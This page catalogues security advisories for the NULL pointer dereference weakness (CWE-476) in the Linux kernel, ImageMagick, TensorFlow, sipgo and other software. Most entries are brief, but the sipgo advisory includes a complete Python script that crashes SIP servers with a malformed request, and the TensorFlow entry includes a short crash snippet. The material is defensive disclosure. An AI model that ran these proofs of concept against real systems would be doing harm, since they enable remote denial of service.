CWE-476
AllowedNULL Pointer Dereference
Abstraction: Base · Status: Stable
The product dereferences a pointer that it expects to be valid but is NULL.
6310 vulnerabilities reference this CWE, most recent first.
GHSA-C5QR-9W5G-63J5
Vulnerability from github – Published: 2025-07-10 09:32 – Updated: 2025-11-18 15:30In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: avoid NULL pointer dereference in mt7996_set_monitor()
The function mt7996_set_monitor() dereferences phy before the NULL sanity check.
Fix this to avoid NULL pointer dereference by moving the dereference after the check.
{
"affected": [],
"aliases": [
"CVE-2025-38316"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-10T08:15:30Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: mt7996: avoid NULL pointer dereference in mt7996_set_monitor()\n\nThe function mt7996_set_monitor() dereferences phy before\nthe NULL sanity check.\n\nFix this to avoid NULL pointer dereference by moving the\ndereference after the check.",
"id": "GHSA-c5qr-9w5g-63j5",
"modified": "2025-11-18T15:30:40Z",
"published": "2025-07-10T09:32:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38316"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/83a422c8169eef95aef57f7ddc467bb126d9ae81"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/cb423ddad0f6e6f55b1700422ab777b25597cc83"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C5V9-72GG-RRQR
Vulnerability from github – Published: 2022-05-17 02:24 – Updated: 2022-05-17 02:24The WriteOnePNGImage function in coders/png.c in ImageMagick through 6.9.9-0 and 7.x through 7.0.6-1 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted file.
{
"affected": [],
"aliases": [
"CVE-2017-11522"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-07-22T21:29:00Z",
"severity": "MODERATE"
},
"details": "The WriteOnePNGImage function in coders/png.c in ImageMagick through 6.9.9-0 and 7.x through 7.0.6-1 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted file.",
"id": "GHSA-c5v9-72gg-rrqr",
"modified": "2022-05-17T02:24:50Z",
"published": "2022-05-17T02:24:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11522"
},
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/issues/586"
},
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/commit/816ecab6c532ae086ff4186b3eaf4aa7092d536f"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/869209"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C5X2-P679-95WC
Vulnerability from github – Published: 2021-08-25 14:43 – Updated: 2024-11-13 17:20Impact
When a user does not supply arguments that determine a valid sparse tensor, tf.raw_ops.SparseTensorSliceDataset implementation can be made to dereference a null pointer:
import tensorflow as tf
tf.raw_ops.SparseTensorSliceDataset(
indices=[[],[],[]],
values=[1,2,3],
dense_shape=[3,3])
The implementation has some argument validation but fails to consider the case when either indices or values are provided for an empty sparse tensor when the other is not.
If indices is empty (as in the example above), then code that performs validation (i.e., checking that the indices are monotonically increasing) results in a null pointer dereference:
for (int64_t i = 0; i < indices->dim_size(0); ++i) {
int64_t next_batch_index = indices->matrix<int64>()(i, 0);
...
}
If indices as provided by the user is empty, then indices in the C++ code above is backed by an empty std::vector, hence calling indices->dim_size(0) results in null pointer dereferencing (same as calling std::vector::at() on an empty vector).
Patches
We have patched the issue in GitHub commit 02cc160e29d20631de3859c6653184e3f876b9d7.
The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "2.5.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.5.0"
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "2.5.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.5.0"
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "2.5.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.5.0"
]
}
],
"aliases": [
"CVE-2021-37647"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-23T19:27:50Z",
"nvd_published_at": "2021-08-12T19:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\nWhen a user does not supply arguments that determine a valid sparse tensor, `tf.raw_ops.SparseTensorSliceDataset` implementation can be made to dereference a null pointer:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.SparseTensorSliceDataset(\n indices=[[],[],[]],\n values=[1,2,3],\n dense_shape=[3,3])\n```\n \nThe [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L240-L251) has some argument validation but fails to consider the case when either `indices` or `values` are provided for an empty sparse tensor when the other is not.\n\nIf `indices` is empty (as in the example above), then [code that performs validation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L260-L261) (i.e., checking that the indices are monotonically increasing) results in a null pointer dereference: \n\n```cc\n for (int64_t i = 0; i \u003c indices-\u003edim_size(0); ++i) {\n int64_t next_batch_index = indices-\u003ematrix\u003cint64\u003e()(i, 0);\n ...\n }\n```\n\nIf `indices` as provided by the user is empty, then `indices` in the C++ code above is backed by an empty `std::vector`, hence calling `indices-\u003edim_size(0)` results in null pointer dereferencing (same as calling `std::vector::at()` on an empty vector).\n\n### Patches\nWe have patched the issue in GitHub commit [02cc160e29d20631de3859c6653184e3f876b9d7](https://github.com/tensorflow/tensorflow/commit/02cc160e29d20631de3859c6653184e3f876b9d7).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.",
"id": "GHSA-c5x2-p679-95wc",
"modified": "2024-11-13T17:20:44Z",
"published": "2021-08-25T14:43:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c5x2-p679-95wc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37647"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/02cc160e29d20631de3859c6653184e3f876b9d7"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-560.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-758.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-269.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/tensorflow/tensorflow"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Null pointer dereference in `SparseTensorSliceDataset`"
}
GHSA-C5X5-P58W-FXGH
Vulnerability from github – Published: 2024-02-20 18:30 – Updated: 2024-08-01 15:31elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.
{
"affected": [],
"aliases": [
"CVE-2024-25260"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-20T18:15:52Z",
"severity": "MODERATE"
},
"details": "elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.",
"id": "GHSA-c5x5-p58w-fxgh",
"modified": "2024-08-01T15:31:26Z",
"published": "2024-02-20T18:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25260"
},
{
"type": "WEB",
"url": "https://github.com/schsiung/fuzzer_issues/issues/1"
},
{
"type": "WEB",
"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=31058"
},
{
"type": "WEB",
"url": "https://sourceware.org/elfutils"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-C5X6-WF2W-722J
Vulnerability from github – Published: 2025-10-07 18:31 – Updated: 2026-02-05 15:31In the Linux kernel, the following vulnerability has been resolved:
media: coda: Add check for kmalloc
As the kmalloc may return NULL pointer, it should be better to check the return value in order to avoid NULL poineter dereference, same as the others.
{
"affected": [],
"aliases": [
"CVE-2022-50509"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-07T16:15:33Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: coda: Add check for kmalloc\n\nAs the kmalloc may return NULL pointer,\nit should be better to check the return value\nin order to avoid NULL poineter dereference,\nsame as the others.",
"id": "GHSA-c5x6-wf2w-722j",
"modified": "2026-02-05T15:31:07Z",
"published": "2025-10-07T18:31:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-50509"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/0209e70ad496c1fcd85c2ec70e6736fd09f95d14"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/11e32126b3e56c3156fb610d793732acd2bdac4f"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/441c05485cf1a29eef05c1fd8281716815283315"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/6e5e5defdb8b0186312c2f855ace175aee6daf9b"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/7a2c66429b04e85fee44d6d9f455327bf23cf49c"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/aa17a252dbde432095e390e2092205d4debb12e1"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ba9cc9e2035f7a45f5222543265daf7cd51f2530"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d308c4a035b636756786af91e5f39f9d92d7d42a"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d9b37ea8869e4e6da90c07a310d819a78cbd23d2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C623-F998-8HHV
Vulnerability from github – Published: 2025-12-16 21:24 – Updated: 2025-12-20 03:33Description
A nil pointer dereference vulnerability was discovered in the SIPGO library's NewResponseFromRequest function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.
The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.
Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the
NewResponseFromRequestfunction.
Technical details
The vulnerability is located in /sip/response.go at line 242 in the NewResponseFromRequest function:
if _, ok := res.To().Params["tag"]; !ok {
uuid, _ := uuid.NewRandom()
res.to.Params["tag"] = uuid.String()
}
Root Cause:
-
Missing To Header: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.
-
Header Copying Logic: During response creation in
NewResponseFromRequest, the code attempts to copy headers from the request to the response. Since there's no To header in the request, no To header is copied to the response. -
Unsafe Assumption: The response creation code assumes the To header exists and calls
res.To().Params["tag"]without checking ifres.To()returnsnil, causing a nil pointer dereference.
Stack Trace:
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]
goroutine 175 [running]:
github.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})
/Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394
Impact
This vulnerability affects all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses.
Attack Impact: - Availability: Complete denial of service - application crashes immediately - Remote Exploitation: Yes - Authentication Required: No - vulnerability triggers during initial response generation which does not require authentication
How to reproduce the issue
To reproduce this issue, you need:
- A SIP application using the vulnerable sipgo library
- Network access to send SIP messages to the target
Steps:
-
Save the following Python script as
sipgo-response-dos.py:```python
!/usr/bin/env python3
import socket import sys import time import random
def create_malformed_register(target_ip, target_port): call_id = f"sipgo-dos-{int(time.time())}" tag = f"sipgo-dos-{random.randint(1000, 9999)}" branch = f"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}"
# Craft malformed SIP request without To header sip_message = ( f"REGISTER sip:{target_ip}:{target_port} SIP/2.0\r\n" f"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\r\n" f"From: <sip:attacker@192.168.1.100>;tag={tag}\r\n" f"Call-ID: {call_id}\r\n" f"CSeq: 1 REGISTER\r\n" f"Contact: <sip:attacker@192.168.1.100:5060>\r\n" f"Content-Length: 0\r\n" f"\r\n" ) return sip_messageif name == "main": if len(sys.argv) != 3: print("Usage: python3 sipgo-response-dos.py ") sys.exit(1)
target_ip = sys.argv[1] target_port = int(sys.argv[2]) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) payload = create_malformed_register(target_ip, target_port) print(f"Sending malformed REGISTER to {target_ip}:{target_port}") sock.sendto(payload.encode('utf-8'), (target_ip, target_port)) print("Exploit sent - target should crash immediately")```
-
Run the script against a vulnerable sipgo application:
bash python3 sipgo-response-dos.py <target_ip> <target_port> -
Observe that the target application crashes with a SIGSEGV panic.
Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/emiago/sipgo"
},
"ranges": [
{
"events": [
{
"introduced": "0.3.0"
},
{
"fixed": "1.0.0-alpha-1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68274"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-16T21:24:16Z",
"nvd_published_at": "2025-12-16T22:15:50Z",
"severity": "HIGH"
},
"details": "### Description\n\nA nil pointer dereference vulnerability was discovered in the SIPGO library\u0027s `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.\n\nThe vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.\n\n\u003e Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function.\n\n### Technical details\n\nThe vulnerability is located in `/sip/response.go` at line 242 in the `NewResponseFromRequest` function:\n\n```go\nif _, ok := res.To().Params[\"tag\"]; !ok {\n uuid, _ := uuid.NewRandom()\n res.to.Params[\"tag\"] = uuid.String()\n}\n```\n\n**Root Cause:**\n\n1. **Missing To Header**: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.\n\n2. **Header Copying Logic**: During response creation in `NewResponseFromRequest`, the code attempts to copy headers from the request to the response. Since there\u0027s no To header in the request, no To header is copied to the response.\n\n3. **Unsafe Assumption**: The response creation code assumes the To header exists and calls `res.To().Params[\"tag\"]` without checking if `res.To()` returns `nil`, causing a nil pointer dereference.\n\n**Stack Trace:**\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]\n\ngoroutine 175 [running]:\ngithub.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})\n /Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394\n```\n\n### Impact\n\nThis vulnerability affects **all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses**.\n\n**Attack Impact:**\n- **Availability**: Complete denial of service - application crashes immediately\n- **Remote Exploitation**: Yes\n- **Authentication Required**: No - vulnerability triggers during initial response generation which does not require authentication\n\n\n### How to reproduce the issue\n\nTo reproduce this issue, you need:\n\n1. A SIP application using the vulnerable sipgo library\n2. Network access to send SIP messages to the target\n\nSteps:\n\n1. Save the following Python script as `sipgo-response-dos.py`:\n\n ```python\n #!/usr/bin/env python3\n import socket\n import sys\n import time\n import random\n\n def create_malformed_register(target_ip, target_port):\n call_id = f\"sipgo-dos-{int(time.time())}\"\n tag = f\"sipgo-dos-{random.randint(1000, 9999)}\"\n branch = f\"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}\"\n \n # Craft malformed SIP request without To header\n sip_message = (\n f\"REGISTER sip:{target_ip}:{target_port} SIP/2.0\\r\\n\"\n f\"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\\r\\n\"\n f\"From: \u003csip:attacker@192.168.1.100\u003e;tag={tag}\\r\\n\"\n f\"Call-ID: {call_id}\\r\\n\"\n f\"CSeq: 1 REGISTER\\r\\n\"\n f\"Contact: \u003csip:attacker@192.168.1.100:5060\u003e\\r\\n\"\n f\"Content-Length: 0\\r\\n\"\n f\"\\r\\n\"\n )\n return sip_message\n\n if __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: python3 sipgo-response-dos.py \u003ctarget_ip\u003e \u003ctarget_port\u003e\")\n sys.exit(1)\n \n target_ip = sys.argv[1]\n target_port = int(sys.argv[2])\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n payload = create_malformed_register(target_ip, target_port)\n \n print(f\"Sending malformed REGISTER to {target_ip}:{target_port}\")\n sock.sendto(payload.encode(\u0027utf-8\u0027), (target_ip, target_port))\n print(\"Exploit sent - target should crash immediately\")\n ```\n\n\n2. Run the script against a vulnerable sipgo application:\n\n ```bash\n python3 sipgo-response-dos.py \u003ctarget_ip\u003e \u003ctarget_port\u003e\n ```\n\n3. Observe that the target application crashes with a SIGSEGV panic.\n\n\u003e Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.",
"id": "GHSA-c623-f998-8hhv",
"modified": "2025-12-20T03:33:26Z",
"published": "2025-12-16T21:24:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68274"
},
{
"type": "WEB",
"url": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8"
},
{
"type": "PACKAGE",
"url": "https://github.com/emiago/sipgo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "SIPGO is Vulnerable to Response DoS via Nil Pointer Dereference"
}
GHSA-C64G-WM7P-FXQP
Vulnerability from github – Published: 2024-11-05 18:32 – Updated: 2024-11-13 03:30In the Linux kernel, the following vulnerability has been resolved:
PCI: Hold rescan lock while adding devices during host probe
Since adding the PCI power control code, we may end up with a race between the pwrctl platform device rescanning the bus and host controller probe functions. The latter need to take the rescan lock when adding devices or we may end up in an undefined state having two incompletely added devices and hit the following crash when trying to remove the device over sysfs:
Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 Internal error: Oops: 0000000096000004 [#1] SMP Call trace: __pi_strlen+0x14/0x150 kernfs_find_ns+0x80/0x13c kernfs_remove_by_name_ns+0x54/0xf0 sysfs_remove_bin_file+0x24/0x34 pci_remove_resource_files+0x3c/0x84 pci_remove_sysfs_dev_files+0x28/0x38 pci_stop_bus_device+0x8c/0xd8 pci_stop_bus_device+0x40/0xd8 pci_stop_and_remove_bus_device_locked+0x28/0x48 remove_store+0x70/0xb0 dev_attr_store+0x20/0x38 sysfs_kf_write+0x58/0x78 kernfs_fop_write_iter+0xe8/0x184 vfs_write+0x2dc/0x308 ksys_write+0x7c/0xec
{
"affected": [],
"aliases": [
"CVE-2024-50122"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-05T18:15:15Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: Hold rescan lock while adding devices during host probe\n\nSince adding the PCI power control code, we may end up with a race between\nthe pwrctl platform device rescanning the bus and host controller probe\nfunctions. The latter need to take the rescan lock when adding devices or\nwe may end up in an undefined state having two incompletely added devices\nand hit the following crash when trying to remove the device over sysfs:\n\n Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000\n Internal error: Oops: 0000000096000004 [#1] SMP\n Call trace:\n __pi_strlen+0x14/0x150\n kernfs_find_ns+0x80/0x13c\n kernfs_remove_by_name_ns+0x54/0xf0\n sysfs_remove_bin_file+0x24/0x34\n pci_remove_resource_files+0x3c/0x84\n pci_remove_sysfs_dev_files+0x28/0x38\n pci_stop_bus_device+0x8c/0xd8\n pci_stop_bus_device+0x40/0xd8\n pci_stop_and_remove_bus_device_locked+0x28/0x48\n remove_store+0x70/0xb0\n dev_attr_store+0x20/0x38\n sysfs_kf_write+0x58/0x78\n kernfs_fop_write_iter+0xe8/0x184\n vfs_write+0x2dc/0x308\n ksys_write+0x7c/0xec",
"id": "GHSA-c64g-wm7p-fxqp",
"modified": "2024-11-13T03:30:45Z",
"published": "2024-11-05T18:32:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50122"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/1d59d474e1cb7d4fdf87dfaf96f44647f13ea590"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d4f38a0e7cc94615f63cf7765ca117e5cc2773ae"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C662-3P6Q-P5C7
Vulnerability from github – Published: 2023-03-28 00:34 – Updated: 2025-02-24 21:31The Heimdal Software Kerberos 5 implementation is vulnerable to a null pointer dereferance. An attacker with network access to an application that depends on the vulnerable code path can cause the application to crash.
{
"affected": [],
"aliases": [
"CVE-2022-3116"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-27T22:15:00Z",
"severity": "HIGH"
},
"details": "The Heimdal Software Kerberos 5 implementation is vulnerable to a null pointer dereferance. An attacker with network access to an application that depends on the vulnerable code path can cause the application to crash.",
"id": "GHSA-c662-3p6q-p5c7",
"modified": "2025-02-24T21:31:43Z",
"published": "2023-03-28T00:34:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3116"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20230505-0010"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/730793"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C688-2X49-65H9
Vulnerability from github – Published: 2022-05-14 01:07 – Updated: 2022-05-14 01:07An issue was discovered in fs/xfs/libxfs/xfs_attr_leaf.c in the Linux kernel through 4.17.3. An OOPS may occur for a corrupted xfs image after xfs_da_shrink_inode() is called with a NULL bp.
{
"affected": [],
"aliases": [
"CVE-2018-13094"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-07-03T10:29:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in fs/xfs/libxfs/xfs_attr_leaf.c in the Linux kernel through 4.17.3. An OOPS may occur for a corrupted xfs image after xfs_da_shrink_inode() is called with a NULL bp.",
"id": "GHSA-c688-2x49-65h9",
"modified": "2022-05-14T01:07:17Z",
"published": "2022-05-14T01:07:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-13094"
},
{
"type": "WEB",
"url": "https://github.com/torvalds/linux/commit/bb3d48dcf86a97dc25fe9fc2c11938e19cb4399a"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:0831"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:2029"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:2043"
},
{
"type": "WEB",
"url": "https://bugzilla.kernel.org/show_bug.cgi?id=199969"
},
{
"type": "WEB",
"url": "https://git.kernel.org/pub/scm/fs/xfs/xfs-linux.git/commit/?h=for-next\u0026id=bb3d48dcf86a97dc25fe9fc2c11938e19cb4399a"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3752-1"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3752-2"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3752-3"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3753-1"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3753-2"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3754-1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C68G-874G-P8WH
Vulnerability from github – Published: 2022-05-14 03:30 – Updated: 2022-05-14 03:30In all Qualcomm products with Android releases from CAF using the Linux kernel, disabling asserts can potentially cause a NULL pointer dereference during an out-of-memory condition.
{
"affected": [],
"aliases": [
"CVE-2014-9972"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-08-18T18:29:00Z",
"severity": "CRITICAL"
},
"details": "In all Qualcomm products with Android releases from CAF using the Linux kernel, disabling asserts can potentially cause a NULL pointer dereference during an out-of-memory condition.",
"id": "GHSA-c68g-874g-p8wh",
"modified": "2022-05-14T03:30:51Z",
"published": "2022-05-14T03:30:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9972"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2017-07-01"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2018-04-01"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/103671"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-56
